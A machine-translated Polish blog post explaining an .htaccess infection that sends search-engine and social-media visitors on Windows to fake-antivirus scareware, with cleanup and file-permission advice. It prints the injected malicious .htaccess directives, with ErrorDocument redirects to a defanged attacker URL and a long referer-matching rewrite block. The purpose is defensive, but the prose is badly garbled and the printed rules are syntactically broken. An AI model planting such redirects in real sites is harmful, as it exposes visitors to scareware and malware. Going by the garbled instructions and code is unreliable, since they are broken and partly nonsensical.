Malware / Virus - .htaccess "przepisać" i przekierowanie

Nowa forma wirusa którzy uważają, że nie wiem, bardzo wpływa witryn w niewiarygodne serwery gdzie użytkownicy konta / konta podrzędne "widzą" się nawzajem. Konkretnie, konta hostingowe są wszystkie w folderze "vhosts"Pisanie i prawo folder użytkownika W "vhosts" podaje ogólne użytkownika ... sprzedawcą w większości sytuacji. Jest to metoda, która nie korzysta z typowych serwerów WWW WHM / cPanel.

Działanie wirusa htaccess. -. Hack Htaccess

Wirus wpływa na pliki .htaccess site ofiarą. Linie są dodawane / Dyrektywy do przekierować odwiedzających (Pochodzących z Yahoo, MSN, Google, Facebook, Twitter, yaindex, MySpace, itd. witryn i portali o dużym natężeniu ruchu), do niektórych stron internetowych, które oferują "antivirus. "Jest fałszywy antywirus, O którym pisałem we wstępie do .

Oto, co wygląda jak .htaccess dotyczy: (Nie ma dostępu do linii adresy URL treści poniżej)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

RewriteCond% {HTTP_REFERER} *. Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Wordpress. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Szukaj *. $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. MetaCrawler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mail *. $ [NC, OR]
RewriteCond% {HTTP_REFERER} *. Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. * Windows *.
RewriteRule. * [R, L]

RewriteCond% {REQUEST_FILENAME}!-F
RewriteCond% {REQUEST_FILENAME}!-D
RewriteCond% {} * Jpg REQUEST_FILENAME $! |.. * Gif $ | *. PNG $
RewriteCond% {HTTP_USER_AGENT}. * Windows *.
RewriteRule. * [R, L]

Ci, którzy używają WordPress znajdzie te linie w pliku .htaccess z public_html. Ponadto wirus tworzy. Htaccess w folderze wp-content.

*Nie są również przypadki, w których zamiast pojawia peoriavascularsurgery.com dns.thesoulfoodcafe.com lub inne adresy.

Co sprawia, że ​​ten wirus.

Po przekierowywany użytkownik jest witany z otwartymi ramionami przez komunikat:

Ostrzeżenie!
Komputer zawiera różne oznaki wirusów i szkodliwych programów obecności. Twój System anty wirus wymaga natychmiastowego sprawdzenia!
Systemu zabezpieczenia wykonać szybkie i wolne skanowanie komputera w poszukiwaniu wirusów i szkodliwych programów.

1 malware

Bez względu na to, który przycisk jest wciśnięty, to podejmowane są na stronie "Mój komputer"Utworzono naśladować XP projekt. To automatycznie uruchamia "skanowania" na końcu której znajdujemy, że "zarażony".

2 malware

Po kliknięciu przycisku OK lub Anuluj, zacznie pobieraniePliku, setup.exe. To setup.exe jest fałszywy antywirus wpływ systemu. Zainstalować jakiś malware propagowanie dalszych powiązań naruszone, a oprócz nich oprogramowanie antywirusowe (Wszystkie fałszywe), że ofiara jest proszona kupić.
Ci, którzy już skontaktował się z wirusem, może skorzystać z tego formularza . Zaleca się również, aby przeskanować cały dysk twardy. Polecić Kaspersky Internet Security lub Kaspersky Anti-Virus.

Ten typ wirusa dotyczy systemów operacyjnych OS gości Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 i Windows 95. Do chwili obecnej nie są znane żadne przypadki infekcji systemów operacyjnych Windows Vista i Windows 7.

Jak możemy usunąć tego wirusa. Htaccess na serwerze i jak zapobiec zakażeniu.

1. Analizować podejrzane pliki i kody kasowania. Aby upewnić się, że plik nie ma wpływu tylko .htaccess zalecana analizować wszystkie pliki . Php si . Js.

2. Przepisz plik. Htaccess i ustawić chmod 644 lub 744 dostęp tylko do zapisu instrukcja użytkownika.

3. Podczas tworzenia hosting konta dla witryny w folderze / Home lub / Webroot To automatycznie tworzy folder, który ma często nazwę użytkownika (użytkownika dla cpanel, ftpItd.). Aby uniknąć pisania i przesyłania danych wirusów z jednego użytkownika na innego użytkownika, zaleca się, aby każdy folder użytkownika do ustawienia:

chmod 644 lub 744, 755 - pokazany jest 644.
chown-R nume_folder nume_user.
chgrp-R nume_user nume_folder

ls-all sposoby, aby sprawdzić, czy zostały one wykonane poprawnie. Powinien pojawić się coś takiego:

drwx-x-x 12 dinamics dinamics maja 4096 6 14: 51 dinamics /
drwx-x-x 10 4096 marca 7 07 Duran Duran: Duran 46 /
drwx-x-x 12 rury rury 4096 Jan 29 11: 23 rury /
drwxr-xr-x 14 4096 lutego 26 2009 Express Express Express /
drwxr-xr-x 9 EZO EZO 4096 maja 19 01: 09 EZO /
drwx-x-x 9 pharma pharma 4096 grudnia 19 22: 29 pharma /

Jeśli jeden z powyżej userele FTP Zainfekowane plikiTo nie może wysłać wirusa do innego hosta użytkownika. Czy minimalne środki bezpieczeństwa w celu ochrony kont umieszczona na serwerze WWW.

Wspólne elementy obszarach dotkniętych tym wirusem.

Wszystkie obszary dotknięte przekierować odwiedzających do witryn zawierających nazwy domeny "/".

Ten "wirus. htaccess"Narusza żadnych CMS (Joomla, WordPress, phpBBItp.) przy użyciu .htaccess,

. Htaccess Przekierowanie Virus & Hack.

Malware / Virus - .htaccess "przepisać" i przekierowanie

O autorze

Stealth LP

Założyciel i redaktor Ustawienia StealthW dniu 2006.
Doświadczenie w systemach Linux operacyjnych (szczególnie CentOS), Mac OS X, Windows XP> Windows 10 i WordPress (CMS).

Zostaw komentarz

Ta strona używa Akismet do redukcji spamu. Dowiedz się, jak przetwarzane są dane komentarza.